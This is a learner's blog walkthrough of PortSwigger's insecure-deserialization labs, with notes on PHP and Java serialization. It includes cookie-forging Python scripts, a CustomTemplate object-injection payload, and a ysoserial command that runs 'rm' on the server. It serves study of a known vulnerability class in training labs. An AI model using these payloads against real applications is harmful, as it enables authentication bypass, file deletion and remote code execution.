PortSwigger Web Security Academy is seriously awesome!

Insecure deserialization

What is serialization?

Serialization is the process of converting complex data structures, such as objects and their fields, into a “flatter” format that can be sent and received as a sequential stream of bytes.

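Serialization: converting an object into a stream of bytes so that complex data can be written to inter-process memory, a file, or a database. (By "complex data" I understand the object itself.)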

Serialization vs deserialization

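Deserialization is the reverse: restoring the stream of bytes to the object as it was before serialization, in the same state.
Languages serialize differently; the result may be a binary format or a string format. An object's attributes, including private ones, are also written into the byte stream. To keep a field from being serialized, it has to be marked "transient" (in Java).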
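Python has no `transient` keyword, but a rough analogue helps me picture this. A minimal sketch with Python's `pickle` (my own illustration, not from the PortSwigger material; the `Session` class and its fields are made up): the "private" `_token` still ends up in the bytes, while `__getstate__` keeps `_cache` out, roughly the way `transient` does in Java.

```python
import pickle


class Session:
    """Hypothetical class; _cache plays the role of a Java transient field."""

    def __init__(self, user: str, token: str):
        self.user = user
        self._token = token            # "private" by convention, still serialized
        self._cache = {"big": "not worth persisting"}

    def __getstate__(self):
        # Copy the attribute dict and drop the field we don't want in the bytes.
        state = self.__dict__.copy()
        del state["_cache"]
        return state

    def __setstate__(self, state):
        # Restore the serialized fields and re-create the excluded one empty.
        self.__dict__.update(state)
        self._cache = {}


blob = pickle.dumps(Session("wiener", "s3cret"))   # object -> bytes
restored = pickle.loads(blob)                      # bytes -> object
print(type(blob).__name__, restored.user, restored._token, restored._cache)
```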

What is insecure deserialization?

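When a website deserializes data that the user can control, an attacker may be able to manipulate serialized objects to pass harmful data into the application code.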

Isn't this just injection again?

It's even possible to replace a serialized object with an object of an entirely different class.

Insecure deserialization is sometimes known as an “object injection” vulnerability. So it really is injection.

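An object of an unexpected class can lead to unexpected behavior, and that's where the damage comes from. Many deserialization-based attacks are completed before deserialization is finished. So even if the website's own functionality never interacts with the malicious object, the deserialization process itself can carry out the attack. This means websites whose logic is written in strongly typed languages can be affected too.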
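To see why "the attack is done before deserialization finishes", here's a Python `pickle` sketch (assumption: Python stands in for PHP/Java here; `User`, `Evil` and `load_user` are hypothetical). `__reduce__` tells pickle which callable to run while rebuilding the object, so that callable fires inside `pickle.loads()`, before the application's type check ever runs. The callable is a harmless `print`; a real payload would pick something like `os.system`.

```python
import pickle


class User:
    """What the hypothetical application expects to get back."""

    def __init__(self, name: str):
        self.name = name


class Evil:
    """Attacker-side class: __reduce__ says 'rebuild me by calling print(...)'."""

    def __reduce__(self):
        return (print, ("side effect ran inside pickle.loads()",))


payload = pickle.dumps(Evil())


def load_user(data: bytes) -> User:
    obj = pickle.loads(data)        # print() has already executed at this point
    if not isinstance(obj, User):   # the type check comes too late
        raise TypeError("not a User")
    return obj


try:
    load_user(payload)
except TypeError as exc:
    print("rejected afterwards:", exc)
```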

How do insecure deserialization vulnerabilities arise?

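Insecure deserialization usually arises from a general lack of understanding of how dangerous it is to deserialize user-controllable data.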

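Sometimes a website adds extra security checks, but they aren't necessarily effective: it's practically impossible to anticipate every case, and the checks usually run after deserialization, which is already too late.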

What is the impact of insecure deserialization?

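The impact is usually severe, because it greatly expands the attack surface and lets the attacker reuse existing application code, potentially ending in RCE. Even without RCE it can lead to privilege escalation, arbitrary file access, and denial-of-service attacks.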

Exploiting insecure deserialization vulnerabilities

We hope to demonstrate how exploiting insecure deserialization is actually much easier than many people believe. This is even the case during blackbox testing if you are able to use pre-built gadget chains. That sounds familiar. What could these gadget chains be?

How to identify insecure deserialization

PHP serialization format

PHP uses a mostly human-readable string format: letters indicate the data type and numbers indicate the length of each entry.

Consider a `User` object with the attributes:

```php
$user->name = "carlos";
$user->isLoggedIn = true;
```

After serialization:

O:4:"User":2:{s:4:"name";s:6:"carlos";s:10:"isLoggedIn";b:1;}

The corresponding PHP functions are serialize() and unserialize().
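To double-check the format, a small Python sketch that produces the same kind of string as PHP's serialize(). It only covers strings, integers, booleans and objects with public properties (passed as a hypothetical `(class_name, attrs)` tuple). Real PHP writes private and protected property names in a mangled form, which this ignores.

```python
def php_serialize(value) -> str:
    """Minimal subset of PHP serialize(): str, int, bool, and simple objects."""
    if isinstance(value, bool):          # check bool first: bool is a subclass of int
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        # PHP counts bytes, not characters
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, tuple):
        class_name, attrs = value
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in attrs.items())
        return f'O:{len(class_name.encode())}:"{class_name}":{len(attrs)}:{{{body}}}'
    raise TypeError(f"unsupported type: {type(value).__name__}")


print(php_serialize(("User", {"name": "carlos", "isLoggedIn": True})))
```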

Java serialization format

Java uses a binary serialization format. It's harder to read, but you can still recognize serialized data if you know the telltale signs.

For example, serialized Java objects always begin with the same bytes, which are encoded as ac ed in hexadecimal and rO0 in Base64.

For Java, look out for code that calls readObject(), which is used to read and deserialize data from an InputStream.
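A rough Python heuristic for spotting serialized data in a cookie or parameter, based on the signs above: PHP values start with a type letter and a colon (`O:`, `a:`, `s:`...), Java data starts with `ac ed` in hex or `rO0` in Base64. The `guess_format` name and the exact regex are my own; it's first-pass triage, not a parser.

```python
import base64
import binascii
import re

# Rough start of a PHP serialized value: object, array, or scalar type letter.
PHP_PATTERN = re.compile(r'^(O:\d+:"[^"]+":\d+:\{|a:\d+:\{|[sibd]:)')


def guess_format(value: str) -> str:
    """Heuristic triage of a (URL-decoded) cookie or parameter value."""
    if value.startswith("rO0"):             # Base64 of the Java magic bytes ac ed
        return "java (base64)"
    if value.lower().startswith("aced"):    # hex dump of ac ed
        return "java (hex)"
    if PHP_PATTERN.match(value):
        return "php"
    try:
        decoded = base64.b64decode(value, validate=True)
    except binascii.Error:
        return "unknown"
    if PHP_PATTERN.match(decoded.decode("latin-1")):
        return "php (base64)"
    return "unknown"


print(guess_format("rO0ABXNyABF"), guess_format('O:4:"User":1:{s:4:"name";s:6:"carlos";}'))
```

URL-decode cookie values first (`%3D` back to `=` and so on), otherwise the Base64 check fails.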

Manipulating serialized objects

Exploiting some deserialization vulnerabilities can be as easy as changing an attribute in a serialized object.

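Hmm, step one: change attribute values. There are two ways to manipulate serialized objects: edit the byte stream directly, or write a short script in the corresponding language to create and serialize a new object yourself. The second approach is easier when dealing with binary serialization formats.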

Modifying object attributes

When tampering with the data, as long as the attacker preserves a valid serialized object, the deserialization process will create a server-side object with the modified attribute values.

?? Is it really that simple?

Not quite, there's one more condition: “website uses this cookie to check whether the current user has access to certain administrative functionality.” Hmm, does anyone actually do that?

“This simple scenario is not common in the wild.” Looks like everyone agrees XD

LAB: Modifying serialized objects

Setting sail!

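At first I looked through a few requests with no clue; there was no byte stream anywhere.
After looking at the responses I remembered the cookie. It looked a lot like Base64, so I sent it to Decoder, and everything fell into place from there.
Oops, edited the wrong thing, silly me: the change has to go into the request, but I'd edited the response.
The admin panel showed up.
But that wasn't the end: I'd only changed the field in that one request, and the browser kept sending the original cookie, so the cookie in the browser had to be changed too.
Press F12 and edit the cookie under the Application tab.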
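The Decoder steps above as a Python sketch. Assumption: the decoded cookie for this lab looks like `O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}`; I'm reconstructing that from memory, so check yours in Burp first. Flipping `b:0` to `b:1` keeps the type label and length intact, which is why the object still deserializes.

```python
import base64
from urllib.parse import quote, unquote

# Assumed decoded cookie for this lab; check your own in Burp Decoder first.
original = 'O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}'
cookie = quote(base64.b64encode(original.encode()).decode(), safe="")


def flip_admin(cookie_value: str) -> str:
    # Cookie -> URL-decode -> Base64-decode -> PHP serialized string
    serialized = base64.b64decode(unquote(cookie_value)).decode()
    # b:0 -> b:1 keeps the type label and length, so the object stays valid
    tampered = serialized.replace('s:5:"admin";b:0;', 's:5:"admin";b:1;')
    # Encode in the reverse order before pasting it back into the browser
    return quote(base64.b64encode(tampered.encode()).decode(), safe="")


new_cookie = flip_admin(cookie)
print(base64.b64decode(unquote(new_cookie)).decode())
```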

Modifying data types

Besides changing an object's attribute values, you can also supply data types the application doesn't expect.

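It notes that PHP-based logic is especially vulnerable here, because PHP's loose comparison operator == is very lenient when comparing different data types. Hmm, I think I've seen this in some meme. Was it JavaScript or PHP?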

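Strings that start with a number behave like 5 == "5" as well: PHP converts the whole string to the number it starts with and ignores the rest, so 5 == "5 of something" is true too.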

This becomes even stranger when comparing a string to the integer 0:

0 == "Example string" // true // wtf?

“ Because there is no number, that is, 0 numerals in the string. PHP treats this entire string as the integer 0.”

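Hmm, hard to know what to say. (This is PHP 7-and-earlier behavior: PHP 8 changed how strings are compared with numbers, and there both 0 == "Example string" and 5 == "5 of something" are false.)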
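A Python emulation of the loose comparison described above, to make the rule concrete. This is a simplified model of PHP 7's `int == string` behavior (the string is cast to its leading number, or 0 if it has none), not a port of PHP's engine; `php7_loose_equals` is my own name, and PHP 8 no longer behaves this way.

```python
import re

# Leading numeric part as PHP 7 reads it: optional whitespace, sign, digits,
# optional fraction and exponent. Simplified; not every PHP rule is covered.
_LEADING_NUMBER = re.compile(r"\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def php7_loose_equals(number: int, text: str) -> bool:
    """Emulate PHP 7's `int == string`: cast the string to its leading number, else 0."""
    match = _LEADING_NUMBER.match(text)
    as_number = float(match.group(0)) if match else 0.0
    return number == as_number


for rhs in ["5", "5 of something", "Example string"]:
    print(repr(rhs), php7_loose_equals(5, rhs), php7_loose_equals(0, rhs))
```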

So, given code like the following:

$login = unserialize($_COOKIE['login']); // 'login' is a hypothetical cookie name
if ($login['password'] == $password) {
    // log in successfully
}

you can use this behavior for “enabling an authentication bypass.” But there's a condition:

Note that this is only possible because deserialization preserves the data type. If the code fetched the password from the request directly, the 0 would be converted to a string and the condition would evaluate to false.

And remember to update the type labels and length indicators:

Be aware that when modifying data types in any serialized object format, it is important to remember to update any type labels and length indicators in the serialized data too. Otherwise, the serialized object will be corrupted and will not be deserialized.
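Updating the length indicators by hand is error-prone, so here's a Python sketch that recomputes every `s:N:` after editing. Assumptions: values don't themselves contain `";` (the non-greedy regex would break on that), and it doesn't touch type labels or the object's property count, which still need manual care. PHP counts bytes, so the length comes from the UTF-8 encoding.

```python
import re

# s:<len>:"<value>";  (non-greedy, so a value containing '";' will confuse it)
_STRING_TOKEN = re.compile(r's:\d+:"(.*?)";', re.DOTALL)


def fix_string_lengths(serialized: str) -> str:
    """Recompute every s:N: length in a hand-edited PHP serialized string."""
    return _STRING_TOKEN.sub(
        lambda m: f's:{len(m.group(1).encode("utf-8"))}:"{m.group(1)}";',
        serialized,
    )


edited = 'O:4:"User":2:{s:8:"username";s:6:"administrator";s:12:"access_token";i:0;}'
print(fix_string_lengths(edited))
```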

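It also recommends an extension, Hackvertor: when working with binary data, it lets you modify the serialized data as a string and automatically updates the binary data, adjusting the offsets accordingly.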

LAB: Modifying serialized data types

The lab description says the site “is vulnerable to authentication bypass as a result.” The goal is to “edit the serialized object in the session cookie to access the administrator account. Then, delete the user carlos.”
With the previous lab's experience, I checked the cookie. Base64-decoded, it's O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"kkbu4w4wcyqhanxqvlp42eocv9o5hxui";}

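By the way, I can't really figure out how to use Hackvertor. Doesn't its GitHub page make it look simple?
I changed the corresponding length of access_token to 1 and its value to 0. Hmm, do I need to change the type too? I don't even know what PHP's abbreviation for integer is.
Error: PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www/index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
How the different types are serialized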

Turns out it wasn't Hackvertor's fault but mine: the session value has to be URL-decoded first and then Base64-decoded.
Change the field to i:0, then generate the new cookie.
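The cookie from this lab rebuilt as a Python sketch. Assumption: since the goal is the administrator account, the username also has to become `administrator` (length 13), which the notes above don't spell out; `forge_cookie` is a hypothetical helper. The key point is `i:0;` instead of a string: after unserialize() the token is still an integer, so PHP 7's loose `==` against the real token string is true as long as that token doesn't start with a digit.

```python
import base64
from urllib.parse import quote, unquote


def php_str(value: str) -> str:
    # PHP string token: s:<byte length>:"<value>";
    return f's:{len(value.encode())}:"{value}";'


def forge_cookie(username: str) -> str:
    # access_token becomes the integer 0 (i:0;) instead of a 32-char string
    body = php_str("username") + php_str(username) + php_str("access_token") + "i:0;"
    serialized = f'O:4:"User":2:{{{body}}}'
    return quote(base64.b64encode(serialized.encode()).decode(), safe="")


cookie = forge_cookie("administrator")
print(base64.b64decode(unquote(cookie)).decode())
```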

Using application functionality

Besides naively checking attribute values, a website's functionality might also perform dangerous operations on data from a deserialized object.

For example, a “Delete user” function deletes the user's profile picture by “accessing the file path in the $user->image_location attribute.” Pass in an object with a modified image_location and you can delete arbitrary files.

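Roughly: the lab relies on invoking the dangerous method by hand, but things get much more interesting when an exploit passes data into dangerous methods automatically. That leads into the next section, Magic methods.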

LAB: Using application functionality to exploit insecure deserialization

‘A certain feature invokes a dangerous method on data provided in a serialized object.’ The description also points explicitly at ‘the serialized object in the session cookie’.
It also provides a backup account; no idea what that's for.

There's a delete account feature. I'll try other things first. Now I'm starting to see what the backup account is for.

O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"omu50cbc6k2m7c638uy9j9u15zmv9oa2";s:11:"avatar_link";s:19:"users/wiener/avatar";}

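Hmm, I guess avatar_link holds the avatar's location, so that's what to change. But I'm not sure about the directory layout: is it under users/? Oh right, this is a web application path. I was probably thinking about it wrong.
Just in case, I uploaded an avatar to check its location.
That backfired: I uploaded the Lenna image, it was too big, and now I can't open it myself.
So my guess is that the path is /home/Carlos/morale.txt, 23 characters.
Failed! Now I see what the backup account is for.
Maybe I have the wrong directory?
/users/Carlos/morale.txt, 24 characters.
Great, both accounts are deleted and the lab still isn't solved. Wonderful.
And I have no idea how to reset it. Wonderful.
Wait 15 minutes.
Checked the solution: /home/Carlos/morale.txt was the right guess, except it's all lowercase. I got the username's case wrong. Heartbroken.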
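The avatar_link swap from this lab as a Python sketch. Assumption: the cookie is the URL-encoded Base64 of the object shown earlier, and `retarget_avatar` (a hypothetical helper) rebuilds only the avatar_link value token, so its length is recomputed automatically. Case matters: `/home/carlos/morale.txt` is 23 bytes, all lowercase.

```python
import base64
from urllib.parse import quote, unquote


def php_str(value: str) -> str:
    # PHP string token: s:<byte length>:"<value>";
    return f's:{len(value.encode())}:"{value}";'


def retarget_avatar(cookie_value: str, new_path: str) -> str:
    """Hypothetical helper: replace the avatar_link value and re-encode."""
    serialized = base64.b64decode(unquote(cookie_value)).decode()
    key = php_str("avatar_link")
    start = serialized.index(key) + len(key)    # old value token starts here
    end = serialized.index('";', start) + 2     # ...and ends after its closing ";
    serialized = serialized[:start] + php_str(new_path) + serialized[end:]
    return quote(base64.b64encode(serialized.encode()).decode(), safe="")


# The object from the notes above, as it would arrive in the cookie.
session = ('O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";'
           's:32:"omu50cbc6k2m7c638uy9j9u15zmv9oa2";s:11:"avatar_link";'
           's:19:"users/wiener/avatar";}')
cookie = quote(base64.b64encode(session.encode()).decode(), safe="")
forged = retarget_avatar(cookie, "/home/carlos/morale.txt")
print(base64.b64decode(unquote(forged)).decode())
```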

Magic methods

“Instead, they are invoked automatically whenever a particular event or scenario occurs.” I don't get it? The previous one was invoked when deleting a user; does this one not need anything at all?

“ They are sometimes indicated by prefixing or surrounding the method name with double-underscores.”

Developers can add magic methods to a class in order to predetermine what code should be executed when the corresponding event or scenario occurs.

Like how a constructor runs when an object is created? “One of the most common examples in PHP is __construct(), which is invoked whenever an object of the class is instantiated, similar to Python’s __init__.” 😕 I think I'm getting close to the right answer.

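Magic methods are usually not vulnerable in themselves. “But they can become dangerous when the code that they execute handles attacker-controllable data”. For example, if an attacker crafts a deserialized object that meets the right conditions, they can “automatically invoke methods” on it.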

“some languages have magic methods that are invoked automatically during the deserialization process.” For example, PHP’s unserialize() method looks for and invokes an object’s __wakeup() magic method. Java has ObjectInputStream.readObject(): a Serializable class can also declare its own readObject() method, and that readObject() is then invoked during deserialization.
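A Python analogue of a magic method that fires during deserialization: `pickle.loads()` calls a class's `__setstate__` automatically while rebuilding the object, a bit like PHP's `__wakeup()` or a custom Java `readObject()`. Sketch only; `Preferences` and `EVENTS` are made up for the demo. Note that `__init__` isn't called on the way in, only `__setstate__`.

```python
import pickle

EVENTS: list[str] = []


class Preferences:
    """Hypothetical class used only for this demo."""

    def __init__(self, theme: str):
        self.theme = theme

    def __setstate__(self, state: dict) -> None:
        # Called by pickle.loads() while rebuilding the object; nobody calls it by hand.
        EVENTS.append(f"__setstate__ saw theme={state['theme']!r}")
        self.__dict__.update(state)


data = pickle.dumps(Preferences("dark"))
obj = pickle.loads(data)
print(EVENTS, obj.theme)
```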

Now I partly understand why the earlier section said extra security checks aren't necessarily effective.

“They allow you to pass data from a serialized object into the website’s code before the object is fully deserialized. This is the starting point for creating more advanced exploits.” 😕 (by the way, I really do love this pouting emoji)

Injecting arbitrary objects

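“injecting arbitrary object types can open up many more possibilities.” By controlling the class of the object in the serialized data, an attacker can influence which code gets executed during and after deserialization.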

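“Deserialization methods do not typically check what they are deserializing.” So any class available to the website can be passed in and deserialized, which lets the attacker create instances of arbitrary classes. “The unexpected object type might cause an exception in the application logic, but the malicious object will already be instantiated by then.” Not sure I get this 🤔. I think it means: even if an object of an unexpected class makes the website logic fail, the malicious object has already been created by that point (?).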

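“The attacker can then pass in a serialized object of this class to use its magic method for an exploit.” Combined with the previous section: the class you pick isn't random, you choose one whose magic methods are useful. That, of course, is the case where the attacker “has access to the source code”.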

“Classes containing these deserialization magic methods can also be used to initiate more complex attacks involving a long series of method invocations, known as a “gadget chain”.” Here it comes 🙌

Lab: Arbitrary object injection in PHP

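I found this hint really helpful. If I remember correctly, wasn't there an editor vulnerability reported from Taiwan in 2023 that was exactly this?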

You can sometimes read source code by appending a tilde (~) to a filename to retrieve an editor-generated backup file.
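The tilde trick in practice just means trying each known path with `~` appended. A tiny Python sketch that only builds the candidate URLs (the base URL is a placeholder, and `backup_candidates` is my own name; fetching them is left to Burp or any HTTP client).

```python
from urllib.parse import urljoin


def backup_candidates(base_url: str, paths: list[str]) -> list[str]:
    """Build editor-backup URLs by appending '~' to each known file path."""
    return [urljoin(base_url, path) + "~" for path in paths]


print(backup_candidates("https://example.net/", ["/libs/CustomTemplate.php"]))
```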

Still, which file am I supposed to audit? I have no idea 😣

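It seems change email is the only feature, and it uses a POST request. Requesting /my-account/change-email~ directly didn't work. Hmm, it should be a .php file, right? Yet requesting /my-account/change-email directly returned "Method Not Allowed".
What does the directory structure actually look like?
Peeked at the solution: “From the site map, notice that the website references the file /libs/CustomTemplate.php”
Watched a video and found it comes from the Site map under Burp Suite's Target tab. I never knew that feature existed. How does it work, though? Some kind of scanner?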

Luckily the code is short, and there's a hint.

<?php

class CustomTemplate {
    private $template_file_path;
    private $lock_file_path;

    public function __construct($template_file_path) {
        $this->template_file_path = $template_file_path;
        $this->lock_file_path = $template_file_path . ".lock";
    }

    private function isTemplateLocked() {
        return file_exists($this->lock_file_path);
    }

    public function getTemplate() {
        return file_get_contents($this->template_file_path);
    }

    public function saveTemplate($template) {
        if (!$this->isTemplateLocked()) {
            if (file_put_contents($this->lock_file_path, "") === false) {
                throw new Exception("Could not write to " . $this->lock_file_path);
            }
            if (file_put_contents($this->template_file_path, $template) === false) {
                throw new Exception("Could not write to " . $this->template_file_path);
            }
        }
    }

    function __destruct() {
        // Carlos thought this would be a good idea
        if (file_exists($this->lock_file_path)) {
            unlink($this->lock_file_path);
        }
    }
}

?>

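Hmm, I jumped to conclusions and went straight for the lock_file_path attribute. To be fair, what does unlink() do? It's a PHP function that deletes a file, which is exactly what's needed.
You can also compute the string length with Hackvertor: <@length>/home/carlos/morale.txt<@/length>
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"h8ogciry8yqy8fizpuckdy2ckw32hg3l";s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";} Don't forget the trailing ;! And don't forget to include the attribute name lock_file_path.
Hmm, got it wrong? Should I set template_file_path instead? But won't PHP append .lock to it? Do I need some kind of truncation?
Haha, my head was spinning and I forgot what this section is about: I need to build an object of the CustomTemplate class!
Ultimately it's because I don't know PHP or the front end well.
O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";} Here O:14: is because the class name CustomTemplate is 14 characters long, and the 1 after it is because there's only one property.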
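The final payload, built with a small Python sketch so the lengths can't be miscounted. `php_str`/`php_object` are hypothetical helpers. I use the plain property name like the lab payload does; PHP's own serialize() would write a private property as `\0CustomTemplate\0lock_file_path`. When the object is destroyed (at the latest when the request finishes), `__destruct()` finds the lock file path and calls `unlink()` on it.

```python
import base64
from urllib.parse import quote, unquote


def php_str(value: str) -> str:
    # PHP string token: s:<byte length>:"<value>";
    return f's:{len(value.encode())}:"{value}";'


def php_object(class_name: str, props: dict[str, str]) -> str:
    # O:<class name length>:"<class>":<property count>:{<name><value>...}
    body = "".join(php_str(name) + php_str(value) for name, value in props.items())
    return f'O:{len(class_name.encode())}:"{class_name}":{len(props)}:{{{body}}}'


payload = php_object("CustomTemplate", {"lock_file_path": "/home/carlos/morale.txt"})
cookie = quote(base64.b64encode(payload.encode()).decode(), safe="")
print(payload)
print(base64.b64decode(unquote(cookie)).decode() == payload)
```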

Gadget chains

A “gadget” is a snippet of code that exists in the application that can help an attacker to achieve a particular goal.

I'd assumed a gadget was some kind of tool; I didn't expect it to be code that already ships with the application.

However, the attacker’s goal might simply be to invoke a method that will pass their input into another gadget.

So that's why they're called “gadget chains”, right?

By chaining multiple gadgets together in this way, an attacker can potentially pass their input into a dangerous “sink gadget”, where it can cause maximum damage.

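But how is this done? It also points out that a gadget chain is not a payload the attacker sends; the gadgets already exist in the website. The attacker only controls the data passed into the chain. This is usually done using a magic method invoked during deserialization, sometimes called a “kick-off gadget”.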
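A toy gadget chain in Python to make the idea concrete (entirely hypothetical classes, with `pickle` standing in for PHP/Java deserialization). All three classes "already exist in the application"; the attacker only arranges them and supplies data. `Report.__setstate__` is the kick-off gadget, `Formatter` passes the data along, and `Logger.write` is the sink; a real sink would be something like a file write or command execution.

```python
import pickle

SINK_LOG: list[str] = []


class Logger:
    """Sink gadget: stands in for something dangerous (file write, exec...)."""

    def write(self, message: str) -> None:
        SINK_LOG.append(message)


class Formatter:
    """Intermediate gadget: forwards data to whatever `out` object it holds."""

    def __init__(self, out):
        self.out = out

    def emit(self, text: str) -> None:
        self.out.write(text.upper())


class Report:
    """Kick-off gadget: its __setstate__ runs during pickle.loads()."""

    def __init__(self, title: str, formatter):
        self.title = title
        self.formatter = formatter

    def __setstate__(self, state: dict) -> None:
        self.__dict__.update(state)
        self.formatter.emit(self.title)


# The attacker writes no new code: they only arrange existing classes and data.
payload = pickle.dumps(Report("attacker-controlled data", Formatter(Logger())))
pickle.loads(payload)
print(SINK_LOG)
```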

In the wild, many insecure deserialization vulnerabilities will only be exploitable through the use of gadget chains.

Sometimes a chain of just one or two steps is enough, but more severe attacks may need “a more elaborate sequence of object instantiations and method invocations.”

Building gadget chains is one of the key skills for exploiting insecure deserialization.

Working with pre-built gadget chains

Identifying gadget chains manually can be very difficult, and is almost impossible without source code.

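It mentions “pre-built gadget chains”. Several tools provide a range of already-discovered chains that have been successfully exploited on other websites. Even without source code, these tools make it fairly easy to identify and exploit insecure deserialization.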

This approach is made possible due to the widespread use of libraries that contain exploitable gadget chains.

This reminds me of the log4j2 and WebP vulnerabilities (the latter is maybe the better fit).

For example, if a gadget chain in Java’s Apache Commons Collections library can be exploited … blah blah

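Hmm, library security really matters. 🤔 Does this count as supply-chain security? And what exactly does software supply-chain security protection involve?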

ysoserial

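It introduces a tool: pick a gadget chain for a library you think the target uses, pass in the command you want to execute, and it builds the serialized object. “but it is considerably less labor-intensive than constructing your own gadget chains manually.” Not that I'd know how to build one anyway.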

Note
In Java versions 16 and above, you need to set a series of command-line arguments for Java to run ysoserial. It then lists the arguments; I'm not sure how current this article is, so I'm leaving them out here.

you can use the following ones to help you quickly detect insecure deserialization on virtually any server:

The URLDNS chain triggers a DNS lookup for a supplied URL. Because it doesn't depend on the target application using a specific library and works on any Java version, it's the most universal chain for detection.
JRMPClient is another universal chain that you can use for initial detection. It works by making the server open a TCP connection to the supplied address.
1. Note that you need to provide a raw IP address rather than a hostname.
2. This chain may be useful in environments where all outbound traffic is firewalled, including DNS lookups.
You can try generating payloads with two different IP addresses: a local one and a firewalled, external one. If the application responds immediately for a payload with a local address, but hangs for a payload with an external address, causing a delay in the response, this indicates that the gadget chain worked because the server tried to connect to the firewalled address. In this case, the subtle time difference in responses can help you to detect whether deserialization occurs on the server, even in blind cases. This trick is way too damn advanced.

Lab: Exploiting Java deserialization with Apache Commons

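“loads the Apache Commons Collections library.” “you can still exploit this lab using pre-built gadget chains”
1. No real idea. The tool apparently needs a specific payload type, so I decided to try URLDNS first.
2. Completely stuck here, so I went straight to the solution.
3. The solution:
4. Log in to the account, then send a request to Repeater.
5. In Java versions 16 and above: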

java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
     --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
     --add-opens=java.base/java.net=ALL-UNNAMED \
     --add-opens=java.base/java.util=ALL-UNNAMED \
     -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 -w 0

(The --add-opens flags are JVM options, so they go before -jar; anything after the jar name is passed to ysoserial as its own arguments.)

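It's not clear to me why the payload uses CommonsCollections4; none of the tutorials I found explain it.

https://wooyun.js.org/drops/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B7%A5%E5%85%B7ysoserial%E5%88%86%E6%9E%90.html Unfortunately this is an archive of a WooYun article, which says a lot about how old ysoserial is.
ysoserial is old and hasn't been updated; without the extra flags it only runs on Java 15 and below. For now I switched versions with archlinux-java set java-11-openjdk.
Also, the Base64 output has to be URL-encoded before it goes into the cookie. (GNU base64 wraps its output every 76 characters by default; base64 -w 0 disables that.)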
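For the URL-encoding step, a small Python sketch (`to_cookie_value` is my own name, and the input below is a stand-in, not real ysoserial output). It removes the line breaks that `base64` inserts by default, checks the result still decodes, and percent-encodes `+`, `/` and `=` so the cookie survives.

```python
import base64
from urllib.parse import quote, unquote


def to_cookie_value(b64_output: str) -> str:
    """Turn `... | base64` output into a cookie-safe value (hypothetical helper)."""
    one_line = "".join(b64_output.split())       # drop line breaks and spaces
    base64.b64decode(one_line, validate=True)    # fail early if it got mangled
    return quote(one_line, safe="")              # '+' -> %2B, '/' -> %2F, '=' -> %3D


# Stand-in for ysoserial output: Java magic bytes plus filler, wrapped like `base64`.
raw = b"\xac\xed\x00\x05" + bytes(100)
wrapped = base64.encodebytes(raw).decode()
value = to_cookie_value(wrapped)
print(value[:12], base64.b64decode(unquote(value)) == raw)
```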
😔 I'm pretty much lost.

PHP Generic Gadget Chains

It mentions a proof-of-concept tool: “PHP Generic Gadget Chains” (PHPGGC).

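It stresses again that the vulnerability is the deserialization of user-controllable data; don't blame the gadget chains or the libraries. Even if you plugged every gadget chain, it wouldn't help unless you stop deserializing untrusted data.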

Lab: Exploiting PHP deserialization with a pre-built gadget chain

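phpggc requires PHP 5.6 or later; just clone it and run it.
Next question: how do you identify the target framework?
OK, while reading a response I noticed a commented-out line, and /cgi-bin/phpinfo.php did show the PHP info. After that it was a matter of digging through it.
I went back and forth without getting it, so I looked at the solution, and it's already beyond what I know: the serialized data also needs a SHA-1-based signature (HMAC-SHA1).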
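Re-signing is just an HMAC over the token. A Python sketch; assumption: the cookie layout is `{"token": ..., "sig_hmac_sha1": ...}`, with the signature being HMAC-SHA1 of the Base64 token under the secret key leaked via the phpinfo page. That's how I understand the lab's solution, so verify it against your own cookie. `sign_token` is a hypothetical helper, and the token and key below are placeholders.

```python
import hashlib
import hmac
import json
from urllib.parse import quote, unquote


def sign_token(token_b64: str, secret_key: str) -> str:
    """Assumed cookie layout: {"token": ..., "sig_hmac_sha1": hex HMAC-SHA1(token)}."""
    signature = hmac.new(secret_key.encode(), token_b64.encode(), hashlib.sha1).hexdigest()
    cookie = json.dumps({"token": token_b64, "sig_hmac_sha1": signature},
                        separators=(",", ":"))   # compact, no spaces
    return quote(cookie, safe="")


# Placeholders: PHPGGC's Base64 output and the secret key found on the phpinfo page.
cookie = sign_token("PHPGGC-BASE64-OUTPUT", "LEAKED-SECRET-KEY")
print(json.loads(unquote(cookie)))
```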

So this is where my lab and exploitation journey ends.

How to prevent insecure deserialization vulnerabilities

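Don't deserialize user input unless it's truly necessary.
If you must, use robust measures to make sure the data hasn't been tampered with, for example a digital signature, and run the check before deserialization begins.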
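On the defending side, "sign it and check before deserializing" could look like this Python sketch. Assumptions: a server-side secret (`SECRET` is a placeholder), HMAC-SHA256, and JSON instead of native object serialization, which is my own swap. The point is that the signature is verified in constant time before anything is parsed.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"server-side secret"   # placeholder; load from configuration in practice


def issue(data: dict) -> str:
    body = base64.urlsafe_b64encode(json.dumps(data).encode()).decode()
    sig = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{sig}"


def load(cookie: str) -> dict:
    body, _, sig = cookie.rpartition(".")
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    # Verify first, in constant time; only then decode and parse anything.
    if not hmac.compare_digest(sig, expected):
        raise ValueError("bad signature")
    return json.loads(base64.urlsafe_b64decode(body))


cookie = issue({"user": "wiener", "admin": False})
print(load(cookie))
```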

On the Margins of Life

PortSwigger Insecure Deserialization